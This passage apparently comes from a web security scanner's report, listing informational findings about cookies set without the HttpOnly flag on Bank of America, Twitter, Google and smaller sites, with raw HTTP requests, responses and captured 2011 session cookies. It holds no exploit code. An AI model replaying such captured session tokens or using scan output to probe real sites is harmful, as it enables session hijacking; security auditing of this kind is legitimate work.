Date: Mon, 25 Apr 2011 23:49:35 GMT
Server: Apache
Set-Cookie: CerberusPublicGUI=9f3i1skvvnpph1et7uucrkbep2; path=/; domain=support.tenable.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19773

<!doctype html>
<html lang="en">
<head>
   <title>Tenable Customer Support Portal</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="stylesheet" href="cerbe
...[SNIP]...

15.101. http://tc.bankofamerica.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?siteID=429&ts=1303820777101&location=http%3A%2F%2Fwww.bankofamerica.com%2Fweblinking%2F%3Freferredby%3Dfuturescholar%26BOA_0020%3D20110426%3A0%3AO%3A6b53285b-42d1-44c7-a12875a0670c1eb1%26state%3DMA%26BA_0021%3Dfalse&tagv=4.3&tz=-300&r=empty&title=Bank%20of%20America%20%7C%20Important%20Notice%20%7C%20Web-linking%20Information&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:26:08 GMT
Connection: Keep-Alive
Content-Type: image/gif
Content-Length: 43
Set-Cookie: TCID=0007af7b-75ac-4458-89c7-86020000005a;path=/;domain=bankofamerica.com;expires=Fri, 26-Apr-2013 12:26:08 GMT;
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Last-Modified: Tue, 26 Apr 2011 12:26:08 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:26:09 GMT;path=/;domain=bankofamerica.com

GIF89a.............!.......,............Q.;

15.102. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 139
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>No siteID in request</P>
   </BODY>
</HTML>

15.103. http://threats2.paretologic.safecart.com/pcha/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://threats2.paretologic.safecart.com
Path:   /pcha/download

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pcha/download?3562113 HTTP/1.1
Host: threats2.paretologic.safecart.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 14:00:42 GMT
Server: Apache
Set-Cookie: paretologic=4L4db6cea6aaf4b16-threats2-rwire; expires=Mon, 18-Jul-2011 05:36:42 GMT; path=/; domain=.safecart.com
Location: http://www.paretologic.com/download/pchealthadvisor/revenuewire
Vary: Accept-Encoding,User-Agent
SRV-ID: web01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


15.104. http://tracking.hearthstoneonline.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hearthstoneonline.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/ajs.php?zoneid=45&source=&cb=65855124824&loc=http%3A//www.spamlaws.com/spam-blocker.html HTTP/1.1
Host: tracking.hearthstoneonline.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:20:52 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/
Set-Cookie: OAID=bc3c4e7f0dcf6fd5ba4018f850568ee3; expires=Wed, 25-Apr-2012 14:20:52 GMT; path=/
Content-Type: text/javascript; charset=UTF-8
Content-Length: 613

var OX_eb505903 = '';
OX_eb505903 += "<"+"script type=\"text/javascript\" language=\"javascript\" src=\"http://www.tkqlhce.com/placeholder-3441112?target=_top&mouseover=N\"><"+"/script><"+"div id=\'be
...[SNIP]...

15.105. http://tracking.hearthstoneonline.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hearthstoneonline.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=447&campaignid=175&zoneid=45&loc=1&referer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&cb=c0bdae5d0b HTTP/1.1
Host: tracking.hearthstoneonline.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=0fb6857ace8480772f6bd0dd83570b75

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:20:54 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0fb6857ace8480772f6bd0dd83570b75; expires=Wed, 25-Apr-2012 14:20:54 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

15.106. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: translate.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:24:55 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=e7f86557588674ba:TM=1303827895:LM=1303827895:S=bchmYUfkIWquHABD; expires=Thu, 25-Apr-2013 14:24:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1404

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...

15.107. http://twitter.com/javascripts/blogger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /javascripts/blogger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/blogger.js HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.hugthecloud.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2
If-Modified-Since: Fri, 22 Apr 2011 17:23:16 GMT

Response

HTTP/1.1 304 Not Modified
Date: Tue, 26 Apr 2011 13:18:29 GMT
Server: Apache
Connection: close
Expires: Tue, 26 Apr 2011 13:23:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: k=173.193.214.243.1303823909837013; path=/; expires=Tue, 03-May-11 13:18:29 GMT; domain=.twitter.com


15.108. http://twitter.com/statuses/user_timeline/hugthecloud.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/hugthecloud.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.hugthecloud.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303823910-81705-29867
X-RateLimit-Limit: 150
ETag: "dcb2235386a41d7ff9cbe42580900723"-gzip
Last-Modified: Tue, 26 Apr 2011 13:18:30 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01135
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303827509
Set-Cookie: k=173.193.214.243.1303823910171269; path=/; expires=Tue, 03-May-11 13:18:30 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr9Ip2a6cBCDOAo1h05uSLBlg5g5fY%2BtAkI%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCEF9pEvAToHaWQiJWZlZGZmY2YxMWU0M2Ez%250AMzUyYWY5NWVmODFkNmNhYWFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--05ae089e95cd1d1ddf9d87e388f559ab51ae5025; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 9213

twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virt
...[SNIP]...

15.109. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?page=login&cmd=approval HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 158
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:45:09 GMT
Location: /?page=login&cmd=approval&a=1
Server: Microsoft-IIS/7.0
Set-Cookie: storemember2=authkey=; expires=Mon, 25-Apr-2011 00:46:08 GMT; domain=afreshbunch.com; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:46:08 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&amp;cmd=approval&amp;a=1">here</a>.</body>

15.110. http://www.afreshbunch.com/files/com/call.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fcachecommand%3Dbypass&loadtime=0.55 HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: site=referring%5Fsite=; ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 167
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:05 GMT


//document.write("<textarea>/Default.asp?</textarea>")
//document.write("<br><textarea>/Default.asp?cachecommand=bypass</textarea>")
//document.write("<Br>")


15.111. http://www.bankofamerica.com/adtrack/index.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /adtrack/index.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adtrack/index.cgi?adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:46 GMT
Content-length: 0
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-cookie: TRACKING_CODE=000309029q890000g161; path=/; expires=Sunday, 23-Oct-2011 23:59:59 GMT
Set-cookie: PROMO=000309029q890000g161; path=/;
Location: https://www.bankofamerica.com/ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161
Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/


15.112. http://www.bankofamerica.com/community/flyout/HM_Arrays.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /community/flyout/HM_Arrays.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/flyout/HM_Arrays.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:31 GMT
Content-length: 3414
Content-type: application/x-javascript
Last-modified: Sat, 05 Jun 2010 10:46:50 GMT
Etag: "d56-4c0a2b1a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3209082539.20480.0000; path=/

/*********************************************************
Version 4 Menu ARRAYS
*********************************************************/

HM_Array3 = [
[170, // menu wi
...[SNIP]...

15.113. http://www.bankofamerica.com/community/stylesheets/community_ov_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /community/stylesheets/community_ov_styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/stylesheets/community_ov_styles.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:30 GMT
Content-length: 1902
Content-type: text/css
Last-modified: Sat, 05 Jun 2010 10:46:50 GMT
Etag: "76e-4c0a2b1a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=424064683.20480.0000; path=/


/*
Filename: community_ov_styles.css
Path: www/bankofamerica/data/community/stylesheets
Description: Applies styles for Community overview page
Origin
...[SNIP]...

15.114. http://www.bankofamerica.com/foundation/flyout/HM_Arrays.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /foundation/flyout/HM_Arrays.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /foundation/flyout/HM_Arrays.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:30 GMT
Content-length: 2963
Content-type: application/x-javascript
Last-modified: Sat, 15 Dec 2007 01:54:25 GMT
Etag: "b93-476333d1"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3259414187.20480.0000; path=/

/*
   Filename:    HM_Arrays.js    
   Path:        /www/bankofamerica/data/foundation/flyout    
   Description:        
   Original Author:    
   Date(MM/DD/YYYY):    
   Change History:
   Date        Author                SIMON WR    Description
   ====        ====
...[SNIP]...

15.115. http://www.bankofamerica.com/global/hs_home/common.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/hs_home/common.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/hs_home/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:17 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/
Content-Length: 13409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...

15.116. http://www.bankofamerica.com/global/hs_home/stylesheets/home_win_ie6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/hs_home/stylesheets/home_win_ie6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/hs_home/stylesheets/home_win_ie6.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:35 GMT
Content-length: 9168
Content-type: text/css
Last-modified: Sat, 09 Jan 2010 11:32:41 GMT
Etag: "23d0-4b486959"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=474396331.20480.0000; path=/

body { margin-top: 0px; margin-left: 0px; margin-right:0px; margin-bottom:0px; }
.inline, .form-inline {    display: inline; }
.inline h1, .inline h2, .inline h3, .inline h4, .inline h5, .inline h6, .inl
...[SNIP]...

15.117. http://www.bankofamerica.com/global/images/new_Banklogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/images/new_Banklogo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/images/new_Banklogo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:01 GMT
Content-length: 24065
Content-type: image/gif
Last-modified: Sun, 25 Oct 2009 17:09:06 GMT
Etag: "5e01-4ae48632"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=524727979.20480.0000; path=/

......JFIF.....H.H....
.Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:06:30 12:19:11.........
...[SNIP]...

15.118. http://www.bankofamerica.com/global/js/bridge-js-utils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/js/bridge-js-utils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/js/bridge-js-utils.js HTTP/1.1
Accept: */*
